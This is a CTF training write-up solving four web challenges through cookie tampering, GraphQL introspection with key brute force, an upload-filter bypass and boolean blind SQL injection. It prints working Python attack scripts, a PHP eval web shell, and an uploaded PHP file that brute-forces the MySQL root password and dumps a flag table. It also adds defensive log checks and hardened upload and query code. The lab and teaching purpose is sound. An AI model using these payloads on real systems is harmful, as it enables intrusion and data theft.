CTF Summer Training: Stage One Assessment, WEB Write-ups

EASY-WEB

Challenge description

[screenshot]

Solution

  1. Right-click to view the page source; it contains a hint.
     [screenshot]
  2. Send a GET request with the parameter source; the response is:
     [screenshot]
  3. POST a name parameter; the response hints at the next step:
     [screenshot]
  4. Following the hint, intercept the request, change user=admin in the Cookie header and resend it.

     [screenshot]

     The response header carries a hint; base64-decoding it gives: ok ,do you know zhenxiaoyu.she is so cute,so let see zhen_xiao_yu_cute.php. Visiting zhen_xiao_yu_cute.php as instructed gives:

     [screenshot]
  5. Reviewing the code shows that zhenxiaoyukey must be assembled in full from the session (the script below collects it one character per request) and then sent to zhen_xiao_yu_give_you_flag.php.
  6. That returns half of the flag and a hint to visit xiaojun.php.
  7. Submit the value the hint asks for, then brute-force the uploaded file's name to obtain the other half of the flag; concatenating the two halves gives the full flag.

import requests

url = 'http://47.97.187.132:10001/'
session = requests.Session()   # one session, so the server-side key state persists between requests


def step_one():
    # zhen_xiao_yu_cute.php appends one character of the key to the end of the
    # response on every request; keep requesting until the closing '>' appears.
    key = ''
    while True:
        back = session.get(url + 'zhen_xiao_yu_cute.php').text
        if back[-1] == '>':
            break
        key += back[-1]

    print("[+] key is " + key)
    print("[+] send it to zhen_xiao_yu_give_you_flag.php")

    # the key is sent both in the query string and in the body
    back = session.get(url + 'zhen_xiao_yu_give_you_flag.php?key=' + key, data={'key': key})
    flag_start = back.text.find("flag")
    flag_over = back.text.find("<!-- xiao yu say:")
    flag_one = back.text[flag_start:flag_over]
    print("[+] I GET FLAG ONE is %s" % flag_one)
    return flag_one


def getxiaojunflag():
    # xiaojun.php shows the first three characters of the stored file name after 'upload'
    startword = session.get(url + "xiaojun.php").text
    startword = startword[startword.find('upload') + 9:startword.find('upload') + 12]
    try:
        session.get(url + "xiaojun.php?try", timeout=1)
    except requests.RequestException:
        pass
    # the remaining three characters are digits: brute-force 000-999
    for i in range(1000):
        filename = "/upload/" + startword + str(i).zfill(3) + '.txt'
        back = session.get(url + filename)
        if back.status_code == 200:
            print(back.text)
            return back.text


step_one()
getxiaojunflag()

GraphQL-WEB

Challenge description

[challenge screenshot]

Key point

GraphQL security mechanisms (introspection)

Solution steps

  1. Opening the challenge shows a single input box, and whatever is entered is echoed back.
  2. Look at the page source first. The request format turns out to be: /graphql?query={Gugugu(gugugu:"'+askinfo+'")}
  3. The API is called graphql, so start by searching for that keyword.

     GraphQL安全指北 (a Chinese GraphQL security guide)

     GraphQL has an introspection mechanism that exposes every type and field the backend defines. All available object types can be listed with a __schema query:

{
    __schema {
        types {
            name
        }
    }
}
RETURN:
{"data":{"__schema":{"types":[{"name":"Query"},{"name":"String"},{"name":"Int"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}}
[screenshot]

http://127.0.0.1:8000/graphql?query={__schema{types{name}}}

All fields of a given object type can then be listed with __type:

{
  __type(name:"Query") {
    fields {
      description
      name
      type {
        name
        kind
        ofType {
          name
          kind
          description
        }
      }
    }
  }
}
RETURN:
{"data":{"__type":{"fields":[{"description":null,"name":"foo","type":{"name":"String","kind":"SCALAR","ofType":null}},{"description":null,"name":"hello_CTFER","type":{"name":"String","kind":"SCALAR","ofType":null}},{"description":"GO ON // you should send key to see flag \u300ckey-type\uff1aNo\\d\\d\\d \u300d ","name":"config","type":{"name":"String","kind":"SCALAR","ofType":null}},{"description":"\u4eba\u7c7b\u7684\u672c\u8d28\u662f\u4ec0\u4e48\uff1f","name":"Gugugu","type":{"name":"String","kind":"SCALAR","ofType":null}},{"description":"calculate a + b then return the result.","name":"add","type":{"name":"Int","kind":"SCALAR","ofType":null}}]}}}
[screenshot]

http://127.0.0.1:8000/graphql?query={%20__type(name:%22Query%22){%20fields%20{%20description%20name%20type%20{%20name%20kind%20ofType%20{%20name%20kind%20description%20}%20}%20}%20}%20}

  4. The description of the config field gives it away: send config with a key of the form "No" plus three digits, so the key can simply be brute-forced:
     http://127.0.0.1:8000/graphql?query={config(key:"No996")}

The script:

#coding=utf-8
import requests

url = 'http://xx:xx'   # challenge host
for i in range(1000):
    # key format from the field description: No followed by three digits;
    # zfill pads the number with zeros on the left to a width of 3
    payload = '{config(key:"No' + str(i).zfill(3) + '")}'
    back = requests.get(url + '/graphql?query=' + payload).text
    if 'flag' in back:
        print(back)
        break

# the hit: http://127.0.0.1:8000/graphql?query={config(key:"No996")}
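Two checks a defender could run over the web server's access log for an endpoint of this shape, as an added example that is not part of the write-up or the challenge: flagging the introspection queries used above, and spotting a client that calls one field with many distinct argument values, which is what the config(key:"No…") brute force looks like from the server side. The log lines, addresses and thresholds are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Added example, not from the write-up: two log checks for a GraphQL endpoint of
# the /graphql?query=... shape seen above. Log format and addresses are constructed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "GET (?P<path>\S+) HTTP')
INTROSPECTION = re.compile(r"(?<!\w)__(schema|type)\b")   # __typename is left alone
# one top-level field call with a single quoted argument: {field(arg:"value")}
FIELD_ARG = re.compile(r'\{\s*(\w+)\s*\(\s*\w+\s*:\s*"([^"]*)"\s*\)')

def query_of(path):
    """Decoded GraphQL query string from a request path, or '' if none."""
    if "?query=" not in path:
        return ""
    return unquote(path.split("?query=", 1)[1])

def is_introspection(query):
    """True when the query walks the schema via __schema or __type."""
    return INTROSPECTION.search(unquote(query)) is not None

def introspection_suspects(lines):
    """Clients that issued introspection queries."""
    hits = set()
    for m in map(LOG_RE.match, lines):
        if m and is_introspection(query_of(m["path"])):
            hits.add(m["ip"])
    return sorted(hits)

def enumeration_suspects(lines, threshold=10):
    """Clients calling one field with many distinct argument values, the
    signature of the config(key:"No000".."No999") brute force."""
    seen = defaultdict(set)
    for m in map(LOG_RE.match, lines):
        call = m and FIELD_ARG.search(query_of(m["path"]))
        if call:
            seen[(m["ip"], call.group(1))].add(call.group(2))
    return {k: len(v) for k, v in seen.items() if len(v) >= threshold}

# constructed sample log: one introspection request, one benign Gugugu call,
# and twelve sequential config(key:"NoNNN") probes from the same client
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jul/2019:10:00:00 +0800] "GET /graphql?query={__schema{types{name}}} HTTP/1.1" 200 312',
    '10.0.0.9 - - [12/Jul/2019:10:00:01 +0800] "GET /graphql?query={Gugugu(gugugu:%22hi%22)} HTTP/1.1" 200 40',
] + [
    '10.0.0.5 - - [12/Jul/2019:10:00:%02d +0800] "GET /graphql?query={config(key:%%22No%03d%%22)} HTTP/1.1" 200 57'
    % (i + 2, i) for i in range(12)
]
```

Disabling introspection in production closes the first finding outright; the second is a rate problem, so the threshold should be set per field from normal traffic rather than the constructed value used here.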

Simple upload

  1. The page is a file upload form. The source shows that the filtering is client-side JavaScript only, which can be bypassed with a browser plugin or by editing the request in Burp.
  2. Try the extensions php2, php3, php4, php5, phps, pht, phtm and phtml; a script can fuzz them.
  3. phps and pht are not filtered: the upload succeeds and the response gives the file's location. Visiting it shows that pht is executed as PHP while phps is not, so connect to the uploaded pht file with Caidao or AntSword (中國(guó)蟻劍).
  4. A hint.txt file is present; it says the flag is in the database.
  5. The database user is root and the password is six digits. Brute-force it from an uploaded PHP file, telling a correct password from the connection result, then connect to the database, run the query and print the result on the page.
     [screenshot]
  6. Visit the page to read the flag.

Script:
#coding=utf-8

import requests

# earlier attempts, superseded by the brute-force body below:
# files = {'fupload': ('1.pht', open('1.pht', 'rb'), 'image/gif', {'Expires': '0'})}
# files = {'fupload': ('1.pht', b'<?php @eval($_POST[1]);?>', 'image/gif', {'Expires': '0'})}

# PHP uploaded as 1.pht: brute-force the six-digit root password against the
# local MySQL, then dump FLAG.flag
php_body = b'''<?php
    error_reporting(0);   // hide the connection errors of failed attempts

    for ($i = 92873; $i < 1000000; $i++) {
        $pass = str_pad($i, 6, "0", STR_PAD_LEFT);   // zero-pad to six digits
        $con = mysqli_connect("localhost", "root", $pass);
        if (!$con) {
            continue;
        }
        echo $pass . " connect ok!";
        $sql = "SELECT * from FLAG.flag";
        $result = mysqli_query($con, $sql);
        while ($row = mysqli_fetch_array($result)) {
            var_dump($row);
            echo '<hr>';
        }
        mysqli_close($con);
        break;
    }
?>'''

files = {'fupload': ('1.pht', php_body, 'image/gif', {'Expires': '0'})}

back = requests.post('http://127.0.0.1:5002/index.php', files=files, data={'submit': 'upload!'})

print(back.text)
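The filter behaviour observed above (php, php2 to php5, phtm and phtml blocked; pht and phps accepted) rebuilt beside the corrected check, as an added example that is not the challenge's code: an extension blacklist fails open on any extension the web server also hands to the PHP interpreter, while an allowlist with a content check fails closed. The blacklist contents are inferred from the extensions tried above, and the file bodies are constructed.

```python
import os
import secrets

# Added example, not from the write-up: the upload filter rebuilt two ways. The
# blacklist models the challenge's server-side check (contents inferred from the
# extensions the write-up tried; .pht and .phps got through), the allowlist is
# the corrected form. Sample file bodies are constructed.
BLACKLIST = {"php", "php2", "php3", "php4", "php5", "phtm", "phtml"}
# allowed extension -> magic bytes the file content must begin with
ALLOWED = {"gif": b"GIF8", "png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff"}

def extension(filename):
    """Final extension only, lower-cased, so 1.PHT and cat.gif.pht are judged on 'pht'."""
    return os.path.splitext(filename)[1].lstrip(".").lower()

def blacklist_allows(filename):
    """Challenge-style filter: reject known PHP extensions, accept everything else.
    It fails open on any extension the server also executes but the list forgot."""
    return extension(filename) not in BLACKLIST

def allowlist_allows(filename, data):
    """Hardened filter: the extension must be a known image type AND the content
    must start with that type's magic bytes. Unknown extensions fail closed."""
    magic = ALLOWED.get(extension(filename))
    return magic is not None and data.startswith(magic)

def stored_name(filename):
    """Server-chosen name for an accepted upload: random stem plus the validated
    extension, so no part of the client-supplied name reaches disk."""
    return secrets.token_hex(8) + "." + extension(filename)

PHP_STUB = b"<?php echo 'not an image'; ?>"   # constructed stand-in for an uploaded script
GIF_STUB = b"GIF89a" + bytes(10)               # constructed minimal GIF header

def evaluate():
    """(blacklist verdict, allowlist verdict) for each constructed upload."""
    cases = {
        "1.pht": PHP_STUB, "1.phps": PHP_STUB, "1.php": PHP_STUB,
        "cat.gif": GIF_STUB, "cat.gif.pht": PHP_STUB, "shell.gif": PHP_STUB,
    }
    return {name: (blacklist_allows(name), allowlist_allows(name, data))
            for name, data in cases.items()}
```

The allowlist still relies on the web server not executing anything under the upload directory, which is the other half of the fix.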

easy-sql

  • Key point: blind SQL injection (boolean-based; the login-success message "登錄成功" is the oracle)
  • Script:
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import requests

url = "http://47.97.187.132:10004/index.php"
findstr = "登錄成功"   # login-success message: present only when the injected condition is true


def is_true(url, findstr, condition):
    """Boolean oracle: inject `condition` after admin' and see whether the login succeeds."""
    payload = "admin' and " + condition + "#"
    response = requests.post(url, data={'user': payload})
    return findstr in response.text


def length(url, findstr):
    # database name length: try 1, 2, 3, ... until the oracle says true
    num = 1
    while True:
        if is_true(url, findstr, "(select length(database()) = %d)" % num):
            return str(num)
        num += 1


def extract(url, findstr, expr, max_len, hi=123):
    # read `expr` one character at a time by testing ascii(mid(expr, i, 1)) = j
    result = ""
    for i in range(1, max_len):
        for j in range(22, hi):
            if is_true(url, findstr, "ascii(mid((%s),%d,1))=%d" % (expr, i, j)):
                result += chr(j)
                break
    return result


def getdata(url, findstr):
    return extract(url, findstr, "database()", 7)


def gettable(url, findstr):
    return extract(url, findstr,
                   "select group_concat(TABLE_NAME) from information_schema.tables where table_schema=DATABASE()", 10)


def getcolumnname(url, findstr):
    return extract(url, findstr,
                   "select group_concat(column_name) from information_schema.columns where table_name='f1ag'", 10)


def getflag(url, findstr):
    return extract(url, findstr, "select fl4g from f1ag", 32, hi=128)


# print(length(url, findstr))        # 6
# print(getdata(url, findstr))       # dbuser
# print(gettable(url, findstr))
# print(getcolumnname(url, findstr))
print(getflag(url, findstr))
# flag{lekaihua_is_panghuhuh}
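To show why the oracle the script above relies on exists and what closes it, here is an added example (not from the write-up) of the login in a vulnerable string-concatenation form and in a parameterised form, on an in-memory SQLite database; the script's ascii(mid()) loop is rerun against both. SQLite spellings (unicode/substr, sqlite_master) stand in for the MySQL ones, and every row is constructed.

```python
import sqlite3
# Added example, not from the write-up: the login the blind-injection script above
# depends on, rebuilt two ways on an in-memory SQLite database with constructed
# rows. SQLite has no database()/information_schema or ascii()/mid(), so the
# probe uses unicode()/substr() and reads sqlite_master; the technique is the same.
SUCCESS, FAILURE = "登錄成功", "登錄失敗"

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(user TEXT, pwd TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'secret')")
    con.execute("CREATE TABLE f1ag(fl4g TEXT)")
    con.execute("INSERT INTO f1ag VALUES ('flag{constructed}')")
    return con

def login_concat(con, user):
    """Vulnerable: the POST value is pasted into the SQL text, so the WHERE
    clause becomes the attacker's true/false oracle."""
    try:
        row = con.execute("SELECT 1 FROM users WHERE user='%s'" % user).fetchone()
    except sqlite3.Error:
        return FAILURE
    return SUCCESS if row else FAILURE

def login_param(con, user):
    """Fixed: bound parameter; the value is compared as one username, never parsed as SQL."""
    row = con.execute("SELECT 1 FROM users WHERE user=?", (user,)).fetchone()
    return SUCCESS if row else FAILURE

def blind_char(login, con, expr, pos, lo=22, hi=128):
    """One step of the script's inner loop: which ASCII code at `pos` of `expr`
    makes the login succeed? None when `expr` has no character there."""
    for j in range(lo, hi):
        probe = "admin' and unicode(substr((%s),%d,1))=%d--" % (expr, pos, j)
        if login(con, probe) == SUCCESS:
            return chr(j)
    return None

def extract(login, con, expr, max_len=40):
    """The script's outer loop: read `expr` character by character through `login`."""
    out = ""
    for pos in range(1, max_len + 1):
        c = blind_char(login, con, expr, pos)
        if c is None:
            break
        out += c
    return out
```

Against login_concat the loop recovers the constructed flag exactly as the script does; against login_param the same probes are just a username that does not exist, so nothing leaks.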